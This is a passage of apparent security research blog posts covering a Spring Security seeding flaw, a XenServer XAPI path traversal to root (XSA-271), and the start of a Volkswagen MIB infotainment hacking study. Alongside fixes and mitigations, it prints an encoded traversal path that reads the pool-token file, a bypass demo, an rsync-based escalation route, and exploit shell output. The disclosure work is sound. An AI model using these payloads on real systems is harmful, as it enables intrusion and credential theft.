When used with a seed, this means that the SecureRandom instance is created in the vulnerable way described above. In other words, the Resource entirely determines all output of this PRNG: if two different objects are created with the same seed, they will return identical output. The note in the documentation stating that the seed supplements, rather than replaces, the existing state and can never reduce randomness is therefore incorrect.

Recommendation

The easiest way to prevent this vulnerability would be to request the first byte even if a seed is set, before calling setSeed():

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    rnd.setSeed(seedBytes);
}

This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.

Mitigation

Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed(), or by ensuring that the seed itself has sufficient entropy.

Conclusion

Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.
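
As a sketch of such an alternative (the names and parameters below are illustrative, not part of Spring Security), a standard KDF such as PBKDF2 from the JCE derives a repeatable key from a secret input without misusing a PRNG:

import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class KdfDemo {
    // Deriving a repeatable key from a secret input: use a real KDF instead
    // of abusing SecureRandom's deterministic mode.
    static byte[] deriveKey(char[] secret, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(secret, salt, 100_000, 256); // 256-bit key
        SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return f.generateSecret(spec).getEncoded();
    }

    public static void main(String[] args) throws Exception {
        byte[] salt = "app-specific-salt".getBytes("UTF-8"); // use a random salt in practice
        byte[] key = deriveKey("input secret".toCharArray(), salt);
        System.out.println("derived " + key.length + "-byte key"); // same inputs, same key
    }
}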

Timeline

2019-03-08 Report sent to [email protected].
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability, an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (ports 80 and 443 by default). Alternatively, the attack can be performed through the browser of a user who has access to this port: either via a DNS rebinding attack, or possibly by using the primary vulnerability to mount a cross-site scripting attack, reading a logfile that contains attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

Technical support for XenServer is available from Citrix.

Source

About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.

Source

While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason the hypervisor is always a high-priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on any IP assigned to the hypervisor (actually the Dom0, to be precise). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.

Either way, given the importance of a hypervisor, it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/xapi_http.ml.

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/datamodel.ml" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
        (try
           if check_rbac
           then (* rbac checks *)
             (try
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e
             )
           else (* no rbac checks *)
             callback req ic context

So in short: if Rbac.is_rbac_enabled_for_http_action returns false, no authentication is performed. Otherwise assert_credentials_ok is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
  [
    "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)
    "post_cli";  (* CLI commands -> calls XMLRPC *)
    "post_json"; (* JSON -> calls XMLRPC *)
    "get_root";  (* Make sure that downloads, personal web pages etc do not go through RBAC asking for a password or session_id *)
    (* also, without this line, quicktest_http.ml fails on non_resource_cmd and bad_resource_cmd with a 401 instead of 404 *)
    "get_blob"; (* Public blobs don't need authentication *)
    "post_root_options"; (* Preflight-requests are not RBAC checked *)
    "post_json_options";
    "post_jsonrpc";
    "post_jsonrpc_options";
    "get_pool_update_download";
]

Authentication is performed in the function assert_credentials_ok, in the file /ocaml/xapi/xapi_http.ml. Some things to note about this function:

  • Besides username and password or an existing session_id, access can be granted by passing the pool_token parameter. This is a static token shared by all nodes in the pool, and is stored at /etc/xensource/ptoken. This token grants full administrative privileges.

  • Administrative access is granted for connections over a local UNIX socket.

This means that any vulnerability that can perform an arbitrary file read or access an internal socket will enable full administrative access.

Finding the primary vulnerability

Since there are not too many endpoints that bypass authentication, it makes sense to quickly skim over each one to see if there is anything interesting.

The mapping from HTTP verb (GET, POST, …) and URL to action name is located in the files under /ocaml/idl/datamodel*.ml, and the mapping from action name to handler function happens in various calls to the add_handler function we already saw. Using this, we find that, for example, the action get_pool_update_download is associated with a GET request to the /update/ URL and is dispatched to the pool_update_download_handler function:

let pool_update_download_handler (req: Request.t) s _ =
  debug "pool_update.pool_update_download_handler URL %s" req.Request.uri;
  (* remove any dodgy use of "." or ".." NB we don't prevent the use of symlinks *)
  let filepath = String.sub_to_end req.Request.uri (String.length Constants.get_pool_update_download_uri)
                 |> Filename.concat Xapi_globs.host_update_dir
                 |> Stdext.Unixext.resolve_dot_and_dotdot 
                 |> Uri.pct_decode  in
  debug "pool_update.pool_update_download_handler %s" filepath;

  if not(String.startswith Xapi_globs.host_update_dir filepath) || not (Sys.file_exists filepath) then begin
    debug "Rejecting request for file: %s (outside of or not existed in directory %s)" filepath Xapi_globs.host_update_dir;
    Http_svr.response_forbidden ~req s
  end else begin
    Http_svr.response_file s filepath;
    req.Request.close <- true
end

This immediately looks extremely suspicious, in particular these two lines:

|> Stdext.Unixext.resolve_dot_and_dotdot
|> Uri.pct_decode  in

Here, the code first resolves any ../ sequences, and after that it performs decoding of URL-encoded sequences such as %25. (In OCaml, the |> operator behaves somewhat like the | (pipe) operator in unix shell scripts.)

This means that if the decoding produces new ../ sequences, they will not be resolved, and the naive check below, which verifies that the resulting path is under the update root directory, is no longer sufficient.

In short, this leads to a classic path traversal vulnerability where %2e%2e%2f sequences can be used to escape the parent directory and read arbitrary files, including the file containing the pool token.
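
To make the ordering problem concrete, here is a rough Java translation of the flawed check (the OCaml original also tests for file existence, which is omitted here). Normalizing before percent-decoding lets an encoded ../ survive the prefix check:

import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import java.nio.file.Paths;

public class TraversalDemo {
    static final Path ROOT = Paths.get("/var/update");

    // Broken: resolves ".." first, percent-decodes afterwards, mirroring the
    // order of operations in pool_update_download_handler.
    static boolean brokenCheck(String uriPath) {
        String resolved = Paths.get(uriPath).normalize().toString(); // no literal ".." to resolve
        String decoded = URLDecoder.decode(resolved, StandardCharsets.UTF_8); // now ".." appears
        return decoded.startsWith(ROOT.toString()); // prefix check still passes
    }

    public static void main(String[] args) {
        String evil = "/var/update/%2e%2e/%2e%2e/etc/xensource/ptoken";
        System.out.println(brokenCheck(evil)); // true: check bypassed
        // The decoded path, /var/update/../../etc/xensource/ptoken, is then
        // resolved by the filesystem to a file outside the update directory.
        System.out.println(URLDecoder.decode(
                Paths.get(evil).normalize().toString(), StandardCharsets.UTF_8));
    }
}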

As described earlier, possession of the pool token enables full administrative access to the hypervisor.

Some notes about a potential alternative to the DNS rebinding attack

One other thing to note is that the response does not set an HTTP Content-Type header, which might make it possible for attackers to exploit a XAPI service on an internal network from the internet if they can trick someone on the internal network into visiting a malicious site (a scenario similar to the previously described DNS rebinding attack).

In this attack the malicious site would first perform a request that contains HTML and JavaScript in the URL, causing these to be written to a log file. In a second request, that logfile would then be loaded as an HTML page. The JavaScript on that page would then be able to read and exfiltrate the pool token and/or perform further requests using it, something JavaScript on a random website on the internet would not normally be able to do because of the same-origin policy enforced by web browsers.

This attack is overall much less practical than the DNS rebinding attack, and we have not investigated it further. The only advantage this attack has is that it could still work even if the XAPI was only available over HTTPS (DNS rebinding is in general not possible over HTTPS because the hostname will be validated by the TLS connection setup even if the HTTP server itself does not).

Obtaining a root shell on Dom0

While the pool token is sufficient to perform most actions on the hypervisor, an attacker is still restricted by the operations that the XAPI supports.

To determine the full impact we investigated whether it was possible to obtain full remote shell access as the operating system “root” user with this pool token. If so, it makes the impact story a good deal simpler: remote shell access as root means complete control, period.

As it turns out, it is possible to abuse the /remotecmd endpoint for this. The code for this endpoint is located in /ocaml/xapi/xapi_remotecmd.ml:

let allowed_cmds = ["rsync","/usr/bin/rsync"]

(* Handle URIs of the form: vmuuid:port *)
let handler (req: Http.Request.t) s _ =
  let q = req.Http.Request.query in
  debug "remotecmd handler running";
  Xapi_http.with_context "Remote command" req s
    (fun __context ->
       let session_id = Context.get_session_id __context in
       if not (Db.Session.get_pool ~__context ~self:session_id) then
         begin
           failwith "Not a pool session"
         end;
       let cmd=List.assoc "cmd" q in
       let cmd=List.assoc cmd allowed_cmds in
       let args = List.map snd (List.filter (fun (x,y) -> x="arg") q) in
       do_cmd s cmd args
    )

This appears to restrict the command to be executed to only rsync, but since rsync supports the -e option that lets you execute arbitrary shell commands anyway, this restriction is not actually effective. It’s unclear whether this constitutes a separate vulnerability, since there are plenty of other ways to abuse rsync to gain remote shell access (overwriting various config files or shell scripts, for example).

This endpoint and the associated ability to execute shell commands is only available to ‘pool sessions’ (i.e. administrative sessions started by other nodes in the same pool), but because we have stolen the pool token we can produce such a session just by passing the stolen token in the right parameter.

Even though a complete exploit is deliberately not provided here, the core vulnerability is simple enough that an attacker will be able to exploit it with a minimum of effort.

Mitigating factors

Computest recommends verifying that none of the IPs assigned to the Dom0 are reachable from less-trusted networks (including the virtual networks assigned to the hosted virtual machines). While this is a best practice, it should not be considered a complete fix for this issue (especially considering the DNS rebinding concerns, which might provide an alternative route of attack).

Xen has noted that some versions of XenServer do not immediately create the /var/update directory on installation. Since the vulnerability can only be exploited when this directory exists, those versions will not be vulnerable directly after installation but will become vulnerable when installing their first update.

It is possible to prevent exploitation of this issue by moving the /var/update directory elsewhere and creating a file named /var/update to prevent the automatic creation of this directory. This will prevent the update functionality from working and may have further negative impact. It is not recommended by us, by Citrix, or by the Xen project, and we take no responsibility for problems caused by doing this.

Resolution

Xen has released a patch for the primary XAPI vulnerability under XSA-271 and has incorporated the fix in future XAPI versions.

Citrix will shortly publish or has published updates for the supported XenServer releases 7.1 LTSR, 7.4 CR and 7.5 CR. Notably, no update will be published for version 7.3, which has been out of support since June.

If you use any of these products, you are advised to upgrade immediately.

Various cloud providers and other members of the Xen security pre-release list have received information about this vulnerability before the public release according to Xen’s usual policy (see also the timeline at the bottom of this document). If they were using XAPI they were able to apply the fix early.

If there is a risk that credentials stored on the Dom0 or any of the VMs hosted by the hypervisor may have been compromised, they should be changed.

There was previously no documented way of rotating the pool token, so Xen has provided the following steps to change it if deemed necessary.

  1. On all pool members, stop Xapi:

    service xapi stop
    
  2. On the pool master:

    rm /etc/xensource/ptoken
    /opt/xensource/libexec/genptoken -f -o /etc/xensource/ptoken
    
  3. Copy /etc/xensource/ptoken to all pool slaves

  4. On the pool master, restart the toolstack:

    xe-toolstack-restart
    
  5. On all pool slaves, restart the toolstack:

    xe-toolstack-restart
    

Note that rotating credentials (including the pool token) is not sufficient to lock out an attacker who has already established an alternative means of control. The above steps are only intended as a possible extra layer of assurance when there is already reasonable confidence that no attack happened, or possibly as part of making a “known good” backup from before an attack safe for use.

Conclusion

Xen and Citrix have responded quickly to patch the issue. However, older versions of XenServer remain without a patch, and upgrading XenServer may not be easy for some users because some features are no longer supported in the free version distributed by Citrix.

In response to the miscellaneous concerns raised in this document Xen has documented a new procedure to change the pool token if desired, but we have had no clear indication of whether other things such as the DNS rebinding aspect will be addressed in the future.

The unexpected discovery of this vulnerability during a basic software quality review shows once again that it is more than worth it to spend some extra time during network design to lock down and segregate management services, especially since the consequences of bugs in such basic infrastructure can be disastrous and patching is often complicated.

In our opinion the XAPI service does not take a very principled approach in its HTTP and authentication layers, which provided room for this bug and some of the other things we mentioned when investigating the impact of this vulnerability.

Timeline

2018-07-04 Disclosure of our draft to Xen and Citrix security teams
2018-07-05 First response from the Xen security team, XSA-271 assigned
2018-07-05 First response from the Citrix security team
2018-07-17 Xen proposes embargo date of 2018-08-14
2018-07-20 Agreed to set embargo date at 2018-08-14
2018-07-30 Received draft of Xen’s advisory
2018-07-31 Xen sends its advisory to its pre-release partners
2018-08-14 Public release of advisories

Volkswagen Auto Group MIB infotainment system - unauthenticated remote code execution as root

19 July 2018 at 00:00

Introduction

Our world is becoming more and more digital, and the devices we use daily are increasingly connected. Thinking of IoT products in domotics and healthcare, it’s easy to find countless examples of how this interconnectedness improves our quality of life.

However, these rapid changes also pose risks. In the big rush forward, we as a society aren’t always too concerned with these risks until they manifest themselves. This is where the hacker community has taken an important role in the past decades: using curiosity and skills to demonstrate that the changes in the name of progress sometimes have a downside that we need to consider.

At Computest, our mission is to improve the quality of the software that surrounds us. While we normally do so through services and consulting for our customers, R&D projects play an important role as well. In 2017 we put significant R&D effort into vehicle security. We chose this topic for a number of reasons, besides it being interesting from a technical point of view. For one, we saw more and more cars in our car park with internet connectivity, often without a convenient mechanism to receive or apply security updates. This ecosystem reminded us of other IoT systems, where we face similar problems concerning remote maintenance. We were interested to see how these affect the current state of security in the automotive industry. We also felt that this research topic would not only be of interest to us, but would also make the world a little bit safer in an industry that affects us all. Lastly, this topic would of course allow us to demonstrate our expertise in the field. This post describes our research approach, the research itself and its findings, the disclosure process with the manufacturer, and finally our conclusions.

We are not the first to investigate the current state of security of automotive vehicles; the research of Charlie Miller and Chris Valasek is the most prominent example. They found that the IVI (in-vehicle infotainment) system in their car suffered from a trivial vulnerability, which could be reached via the cellular connection because it was not firewalled. We wanted to see if anything had changed since then, or if the same attack strategy might also succeed against other cars.

For this research, we looked at different cars from different models and brands, with the similarity that all cars had internet connectivity. In the end, we focused our research on one specific in-vehicle infotainment (IVI) system, that is used in most cars from the Volkswagen Auto Group and often referred to as MIB. More specifically, in our research we used a Volkswagen Golf GTE and an Audi A3 e-tron.

At Computest we believe in public disclosure of identified vulnerabilities, as users should be aware of the risks related to using a specific product or service. At the same time, we consider it our responsibility to ensure that nobody is put at unnecessary risk and that no unnecessary damage is caused by such a disclosure.

The vulnerabilities we identified are all software-based and could therefore be mitigated via a firmware upgrade. However, this cannot be done remotely, but must be done by an official dealer, which makes upgrading the entire fleet at once difficult.

Based on the above, we decided not to provide full disclosure of our findings in this post. We describe the process we followed, our attack strategy and the system internals, but not the full details of the remotely exploitable vulnerability, as we would consider that irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

This is also why we first informed the manufacturer about the vulnerability and disclosed all our findings to them, gave them the chance to review this research post, and offered to incorporate a related statement into this document. We received feedback on the research post at the beginning of February 2018. Prior to the release of this post, Volkswagen sent us the letter that is attached to it, confirming the vulnerabilities. In this letter they also state that the vulnerabilities have been fixed in an update to the infotainment system, which means that new cars produced since the update are not affected by the vulnerabilities we found.

Car anatomy

A modern-day vehicle is much more connected than meets the eye. In the old days, cars were mostly mechanical vehicles that relied on mechanics for functionality like steering and braking. Modern vehicles mostly rely on electronics to control these systems. This is often referred to as drive-by-wire, and it has several advantages over the traditional mechanical approach. Several safety features are possible because components are computer controlled. For example, some cars can and will brake automatically if the front radar detects an obstacle ahead and considers a collision inevitable. Drive-by-wire is also used for luxury functionality such as automatic parking, by electronically taking over the steering wheel based on radar/camera footage.

All these new functionalities are possible because every component in a modern car is hooked up to a central bus, which components use to exchange messages. The most common bus system is the CAN (Controller Area Network) bus, which is present in all cars built since the nineties. Nowadays it controls everything, from steering to unlocking the doors to the volume knob on the radio.

The CAN protocol itself is relatively straightforward. In essence, each message has an arbitration ID and a payload. There is no authentication, authorization, signing or encryption: once you are on the bus, you can send arbitrary messages, which will be received by all parties connected to the same bus. There is also no sender or recipient information; each component decides for itself whether a specific message applies to it.
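
For illustration, a classic CAN 2.0 frame can be modelled in a few lines; note that there is no field for the sender, let alone a signature (the arbitration ID below is arbitrary, not a real message ID):

public class CanFrame {
    final int arbitrationId; // 11-bit standard or 29-bit extended identifier
    final byte[] payload;    // 0..8 data bytes in classic CAN

    CanFrame(int arbitrationId, byte[] payload) {
        if (payload.length > 8)
            throw new IllegalArgumentException("classic CAN carries at most 8 data bytes");
        this.arbitrationId = arbitrationId;
        this.payload = payload.clone();
    }

    public static void main(String[] args) {
        // There is no sender field and no authentication: any node on the bus
        // can emit any arbitration ID, and receivers filter on the ID alone.
        CanFrame spoofed = new CanFrame(0x1A0, new byte[] { (byte) 0xFF, 0x00 });
        System.out.printf("id=0x%X len=%d%n", spoofed.arbitrationId, spoofed.payload.length);
    }
}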

In theory, this means that if an attacker were to gain access to the CAN bus of a vehicle, he or she would control the car. They could, for example, impersonate the front radar to instruct the braking system to make an emergency stop due to a near collision, or take over the steering. The attacker only needs to find a way to get access to a component that is connected to the CAN bus, without physical access.

The attacker has a lot of remote attack surface to choose from. Some vectors require close proximity to the car, while others are reachable from anywhere around the globe. Some vectors require user interaction, whereas others can be attacked without the passengers knowing.

For example, modern cars have a system for monitoring tire pressure, called TPMS (Tire Pressure Monitoring System), which will notify the driver if one of the tires has low pressure. This is a wireless system: the tire communicates its current pressure via radio signals or Bluetooth to a receiver inside the car. This receiver, in turn, notifies other components via a message on the CAN bus. The instrument cluster receives this message and in response turns on the appropriate warning light. Another example is the key fob, which communicates wirelessly with a receiver in the car, which in turn communicates with the locks in the doors and with the immobilizer in the engine. All these components have two things in common: they are connected to the CAN bus, and they have remote attack surface (namely the receiver).

Modern cars have two main ways of protecting against malicious CAN messages. The first is the defensive behavior of all components in a car. Each component is designed to always choose the safest option, in order to protect against components that might be malfunctioning. For example, automatic steering for automatic parking might be disabled by default, only to be enabled when the car is in reverse and at low speed. And if another, malicious, device on the bus impersonates the front radar to try to trigger an emergency stop, the real front radar will continue to spam the bus with messages that the road is clear.

The second protection mechanism is that a modern car has more than one CAN bus, separating safety-critical devices from convenience devices. The brakes and engine, for example, are connected to a high-speed CAN bus, while the air conditioning and windscreen wipers are connected to a separate (and most likely low-speed) CAN bus. In theory these busses should be completely separated; in practice, however, they are often connected via a so-called gateway. This is because there are circumstances where data must flow from the low-speed to the high-speed CAN bus and vice versa. For example, the door locks must be able to communicate with the engine to enable and disable the immobilizer, and the IVI system receives status information and error codes from the engine to show on the central display. Firewalling these messages is the responsibility of the gateway: it monitors every message on every bus and decides which messages are allowed to pass through.

In the last few years we have seen an increase in cars that feature an internet connection; we have even seen cars with two cellular connections at once. This connection can, for example, be used by the IVI system to obtain information such as maps data, to offer functionality like an internet browser or a Wi-Fi hotspot, or to give owners the ability to control some features via a mobile app, for example to remotely start the central heating to preheat the car or to remotely lock/unlock the car. In all situations, the device that has the cellular connection is also hooked up to the CAN bus, which makes it theoretically possible to remotely compromise a vehicle.

This attack vector is not just theory; researchers have succeeded at this in the past. Some of these attacks were possible because the cellular connection was not firewalled and had a vulnerable service listening; others relied on the user visiting an attacker-controlled webpage in the in-car browser and exploited a vulnerability in the rendering engine.

Research goal

A modern car has many remote vectors, such as Bluetooth, TPMS and the key fob, but most of them require the attacker to be in close proximity to the victim. For this research, however, we specifically focused on attack vectors that can be triggered via the internet and without user interaction. Once we found such a vector, our goal was to see if we could use it to influence either driving behavior or other safety-critical components in the car. In general, this would mean gaining access to the high-speed CAN bus, which connects components like the brakes, the steering wheel and the engine.

We chose the internet vector over the others because such an attack would further illustrate our point about the risks involved in the current ecosystem. All other vectors require being physically close to the car, making the impact typically limited to only a handful of cars at a time.

We formulated the following research question: “Can we influence the driving behavior or critical security systems of a car via an internet attack vector?”.

Research approach

We started this research with nine different models from nine different brands. These were all lease cars belonging to employees of Computest. Since we were not the actual owners of the cars, we asked permission for conducting this research beforehand from both our lease company and the employees driving the cars.

We conducted a preliminary investigation in which we mapped the possible attack vectors of each car. Determining the attack vectors was done by looking at the architecture, reading public documentation and performing a short technical review.

Things we were specifically searching for:

  • cars with only a single or few layers between the cellular connection and the high-speed CAN bus;
  • cars which allowed us to easily swap SIM cards (since we are not the owner of the cars, soldering, decapping etc. is undesirable);
  • cars that offered a lot of services over cellular or Wi-Fi.

From here we chose the car which we thought would give us the highest chance of success. This is of course subjective and does not guarantee success: for some models getting initial access might be easier than for others, but that says nothing about the effort required for lateral movement.

We finally settled on the Volkswagen Golf GTE as our primary target. We later added the Audi A3 e-tron to our research. Both vehicles share the same IVI system which, at first sight, seemed to have a broad attack surface, increasing the chance of finding an exploitable vulnerability.

Research findings

Initial access

We initially started our research with a Volkswagen Golf GTE from 2015, with the Car-Net app. This car has an IVI system manufactured by Harman, referred to as the modular infotainment platform (MIB). Our model was equipped with the newer version (version 2) of this platform, which had several improvements over the previous version (such as Apple CarPlay). It is important to note that our model did not have a separate SIM card tray. We assumed that the cellular connection used an embedded SIM inside the IVI system, but this assumption would later turn out to be invalid.

The MIB version installed in the Volkswagen Golf can connect to a Wi-Fi network. A quick port scan on this interface shows that there are many services listening:

$ nmap -sV -vvv -oA gte -Pn -p- 192.168.88.253
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-05 10:34 CET
Host is up, received user-set (0.0061s latency).
Not shown: 65522 closed ports
Reason: 65522 conn-refused
PORT      STATE    SERVICE         REASON      VERSION
23/tcp    open     telnet          syn-ack     Openwall GNU/*/Linux telnetd
10123/tcp open     unknown         syn-ack
15001/tcp open     unknown         syn-ack
21002/tcp open     unknown         syn-ack
21200/tcp open     unknown         syn-ack
22111/tcp open     tcpwrapped      syn-ack
22222/tcp open     easyengine?     syn-ack
23100/tcp open     unknown         syn-ack
23101/tcp open     unknown         syn-ack
25010/tcp open     unknown         syn-ack
30001/tcp open     pago-services1? syn-ack
32111/tcp open     unknown         syn-ack
49152/tcp open     unknown         syn-ack

Nmap done: 1 IP address (1 host up) scanned in 259.12 seconds

There is a fully functional telnet service listening, but without valid credentials this seemed like a dead end. An initial scan did not return any valid credentials, and as it later turned out, the passwords consist of eight random characters. Some of the other ports seemed to be used for sending debug information to the client, like the current radio station and GPS coordinates. Port 49152 has a UPnP service listening, and after some research it was clear that it uses PlutinoSoft Platinum UPnP, which is open source. This service piqued our interest because the exact same service was also found on the Audi A3 (also from 2015). That car, however, had only two open ports:

$ nmap -p- -sV -vvv -oA a3 -Pn 192.168.1.1
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-04 11:09 CET
Nmap scan report for 192.168.1.1
Host is up, received user-set (0.013s latency).
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT      STATE  SERVICE REASON       VERSION
53/tcp    open   domain  syn-ack      dnsmasq 2.66
49152/tcp open   unknown syn-ack

Nmap done: 1 IP address (1 host up) scanned in 235.22 seconds

We spent some time reviewing the UPnP source code (but by no means was this a full audit) but didn’t find an exploitable vulnerability.

We initially picked the Golf as primary target because it had more attack surface, but this at least showed that the two systems were built upon the same platform.

After further research, we found a service on the Golf with an exploitable vulnerability. Initially we could use this vulnerability to read arbitrary files from disk, but we could quickly expand our possibilities into full remote code execution. This attack only worked via the Wi-Fi hotspot, so the impact was limited: you have to be near the car, and it must connect to the attacker’s Wi-Fi network. But we did have initial access:

$ ./exploit 192.168.88.253
[+] going to exploit 192.168.88.253
[+] system seems vulnerable...
[+] enjoy your shell:
uname -a
QNX mmx 6.5.0 2014/12/18-14:41:09EST nVidia_Tegra2(T30)_Boards armle

Because there is no mechanism to update this type of IVI remotely, we made the decision not to disclose the exact vulnerability we used to gain initial access. We think that giving full disclosure could put people at risk, while not adding much to this post.

MMX

The system we had access to identified itself as MMX. It runs on the ARMv7a architecture and uses the QNX operating system, version 6.5.0. It is the main processor in the MIB system and is responsible for things like screen compositing, multimedia decoding and satnav.

We noticed that the MMX unit was responsible for the Wi-Fi hotspot functionality, but not for the cellular connection that was used for the Car-Net app. However, we did find an internal network. Finding out what was on the other end was the next step in our research.

# ifconfig mmx0
mmx0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
 address: 00:05:04:03:02:01
 media: <unknown type> autoselect
 inet 10.0.0.15 netmask 0xffffff00 broadcast 10.0.0.255
 inet6 fe80::205:4ff:fe03:201%mmx0 prefixlen 64 scopeid 0x3

One of the problems we faced was the lack of tools on the system and the lack of a build chain to compile our own. Because of this, we couldn’t get a socket or process list, for example. The QNX operating system and build chain are commercial software, for which we didn’t have a license. At first, we tried to work with the tools that were already present: we relied on a broadcast ping for host discovery, and used the included ftp client for a port scan (which took ages). While cumbersome, this revealed one other host alive on this network. Eventually we applied for a trial version of QNX. Not expecting much of it, we continued our research, but after a few weeks our application got through and we received a demo license. This meant we had access to standard tools like telnet and ps, as well as a build chain.

The device on the other end identified itself as RCC, and also had a telnet service running. We tried logging in using the same credentials, but this initially failed. After further investigating MMX’s configuration it became apparent that MMX and RCC share their filesystems using Qnet, a proprietary QNX protocol. MMX and RCC are allowed to spawn processes on each other and read each other’s files (such as the shadow file). It even turned out that the shadow file on RCC was just a symlink to the shadow file on MMX. The original telnet binary turned out not to function correctly, causing the password-reject message; after some rewriting everything worked as expected.

# /tmp/telnet 10.0.0.16
Trying 10.0.0.16...
Connected to 10.0.0.16.
Escape character is '^]'.


QNX Neutrino (rcc) (ttyp0)

login: root
Password:

     ___           _ _   __  __ ___ _____
    /   |_   _  __| (_) |  \/  |_ _|  _  \
   / /| | | | |/ _  | | | |\/| || || |_)_/
  / __  | |_| | (_| | | | |  | || || |_) \
 /_/  |_|__,__|\__,_|_| |_|  |_|___|_____/

/ > ls -la
total 37812
lrwxrwxrwx  1 root      root             17 Jan 01 00:49 HBpersistence -> /mnt/efs-persist/
drwxrwxrwx  2 root      root             30 Jan 01 00:00 bin
lrwxrwxrwx  1 root      root             29 Jan 01 00:49 config -> /mnt/ifs-root/usr/apps/config
drwxrwxrwx  2 root      root             10 Feb 16  2015 dev
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 eso
drwxrwxrwx  2 root      root             10 Jan 01 00:00 etc
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 hbsystem
lrwxrwxrwx  1 root      root             20 Jan 01 00:49 irc -> /mnt/efs-persist/irc
drwxrwxrwx  2 root      root             20 Jan 01 00:00 lib
drwxrwxrwx  2 root      root             10 Feb 16  2015 mnt
dr-xr-xr-x  1 root      root              0 Jan 01 00:37 net
drwxrwxrwx  2 root      root             10 Jan 01 00:00 opt
dr-xr-xr-x  2 root      root       19353600 Jan 01 00:49 proc
drwxrwxrwx  2 root      root             10 Jan 01 00:00 sbin
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 scripts
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 srv
lrwxrwxrwx  1 root      root             10 Feb 16  2015 tmp -> /dev/shmem
drwxr-xr-x  2 root      root             10 Jan 01 00:00 usr
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 var
/ >

RCC

